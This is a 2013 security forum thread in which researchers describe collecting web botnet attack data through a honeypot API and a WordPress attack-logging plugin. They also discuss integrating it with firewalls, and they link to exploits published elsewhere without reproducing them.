Slaying dragons(botslayer)

[bwall]

For the past few months(even maybe half a year now), along with DigiP, I have been researching web botnets, attacks they use, and common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and released 2 exploits for taking down the botnets themselves.

The issue we have run into is that we have a limited amount of data/honey pots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honey pot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or in a slightly less ethical manor, take control of them.

The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis

Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder

and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php

The exploits:

http://www.exploit-db.com/exploits/24883/

http://www.exploit-db.com/exploits/20168/

So if you want to help the good fight, please help out anyway you can. I try to make everything I release as open source as possible, but somethings need to stay a bit in the dark for security's sake, because I know botters follow my work.

[GuardMoony]

Verry nice research :)

Only 1 small thing crossed my mind reading the Attack Analysis. Your accepting any kind of connection. No check for users or unique codes ? Wont you run the risk of getting false info spammed ?

Anyways ill mayby look to set a small honeypot for it :)

[digip]

We get plenty of spam already, but i think bwall has most of that filtered out. The main thing is to get others to contribute attack data from their own sites, and one of the reasons we developed the Attack Scanner plug-in for Wordpress, which takes the guess work out for a lot of it for people but also provides a firewall at the same time if you purchase the pro version. Free version is only a logging utility, but the Pro version has not only a firewall that blocks the attacks, also checks for more types of attacks than what is in just the free version. If you run a Wordpress site, using our plug-in is one easy way to help, but if you have access to full blown web hosts and want to build honeypots, bwall's api is the better way to go since it does a lot more than our Wordpress plug-in and works without any CMS needed. just requires a webserver with the software to run the scripts.

Edited March 27, 2013 by digip

[bwall]

Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into a local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information.

If you are looking for the Attack Scanner link, its in DigiP's signature, but in the case that changes at some point, here it is: http://www.attack-scanner.com/

If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.

[GuardMoony]

Anyway to implement it into pfsense? Mayby by using snort ?

[digip]

At one time we envisioned porting snort and nmap rules from things we logged, but right now, we're focused more on gathering intel on attacks, blocking them, and also downloading files attackers attempt to upload, which is part of the new API added to Attack Scanner Pro. At some point, its going to be its own stand alone form that requires no CMS or plug-in to run, so thats the goal, but right now its collect, dissect and dismantle the bots we capture. Now might be the time to deploy the API from the pro version, into the next free version update since we've got over 1000 installs of the free version running out there, collecting data, it just doesn't check for nearly as many things as the pro version, nor does it have any firewall tools built in to block attacks. Its strictly a logging utility, as where the pro version does both logging and blocking, and also looks for more attacks than what is in the free version.

Comparison (Scroll down):

http://www.attack-scanner.com/wordpress-attack-scannerfree/

Bwall has some things up his sleeves to implement even further as well, so anyone wanting to help run the API version and help contribute stats, more than welcome to come on board and join the fun.

[GuardMoony]

Yes i have read all of that DigiP. But i wonder if its possible for a pfsense plugin that does those detection. And send the information towards you guys. Because its way easyer to put something like this on the firewall of webservers. Then to add it on every site itself.

[digip]

Yes i have read all of that DigiP. But i wonder if its possible for a pfsense plugin that does those detection. And send the information towards you guys. Because its way easyer to put something like this on the firewall of webservers. Then to add it on every site itself.

I'm sure it could be done. I've never used snort or pfsense so I don't know how the rules work and how it sets up alerts, but we do GeoIP lookup data, pull the full string from the attacker, their cookies, files they try to upload, etc. Its not merely just, check rule, block, forward alert type of stuff, but Bwall might be more familiar with snort and if it can do what you ask. That would be really cool to pool other tools into the mix that can adapt and gather/do much of the same thing while still sending us all the same info we're pulling now.

Here is an example of the basic info we pull and this doesn't include whats in the new API which pulls even more info such as the cookies and actual attempted upload files an attacker sends to the server:

Top portion displays in wordpress on the logs, as well as can be exported to CSV. Bottom portion also shows, but we also plot it on a google map with the corresponding info for a more visual idea of where attacks originate from and show up

(
[ip] => x.x.x.x
[attack] => Pre defined attack class names go here based on what is in the plug-in
[date] => 2013-04-01 04:25:10
[hostaddress] => resolved hostname if any, otherwise, just the x.x.x.x shows here
[browser] => User agent, including tools such as libwww/per;l, php, or detection of telnet or no string used with scripts not sending an agent.
[referred] => if they came in form a local link or external site
[method] => get, head, options, fake, anything, if its in the request, we'll see it and log it as such
[text] => http://fullsiteurl.com/attackstringdata
[rfi] => /attaclstringdata
[ipInformation] => stdClass Object
(
[data] => stdClass Object
(
[CountryCode] => Country code
[IP] => x.x.x.x
[CountryName] => Country name
[Region] => State ID
[City] => City
[PostalCode] => Zip Code
[Latitude] => geo IP lat
[Longitude] => geo IP lat
[Hostname] => resolved name
)

[ip] => x.x.x.x
)

)

Its basically just serialized data based on what we capture then json'ed out after sanitizing any data captured.

Sample pic of the world map with just the top 1000 hits. This is only adjusted to top 1000, since some months(we rotate logs twice a month due to the size) its so large, google maps won't even load if there are too many pushpins: http://www.attack-scanner.com/images/april-sample.png

Each month is different with varying amounts of data. One thing we don't log, which I have a whole other plug-in for just to make users aware, is a Login Alerts plug-in that shows login attempts. It was never meant to be more than a warning for myself when people attack, but others using it now want all kinds of things added on, which given time I might do, and work into some sort of central logging place like we have with the other central logs. It was made more or less for my own needs and I threw it up on WordPress.org for free, but I have a version of my own modded to collect brute force attempts and log all the data, which acts as a honeypot:

http://www.attack-scanner.com/brutes/brutes.log

On the snort and pfsense stuff, I'd say try hitting up bwall on twitter if he doesn't get back to here with an answer. He's hella busy, but I know we want as much data as possible and he may be able to write something that does much of the same if the data gets sent to him how he wants, he can do the lookups and such on our end so thats not as important as the attacking IP, files, agent, cookies and the attack string are, where we can sort of derive the rest of the data on our own.

This is still a learning process, but also something that we've been working on in spare time, so we don't spend 8 hours a day every day dealing with this since we have regular day jobs. http://www.attack-scanner.com/papers-and-info/

[GuardMoony]

Yeah i understand it digiP. Atm im setting up my own server to put in a datacenter.

[bwall]

Snort only does detection on a packet by packet basis(correct me if I'm wrong, its been a while), so I don't believe snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to setup an easy to use SDK from various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.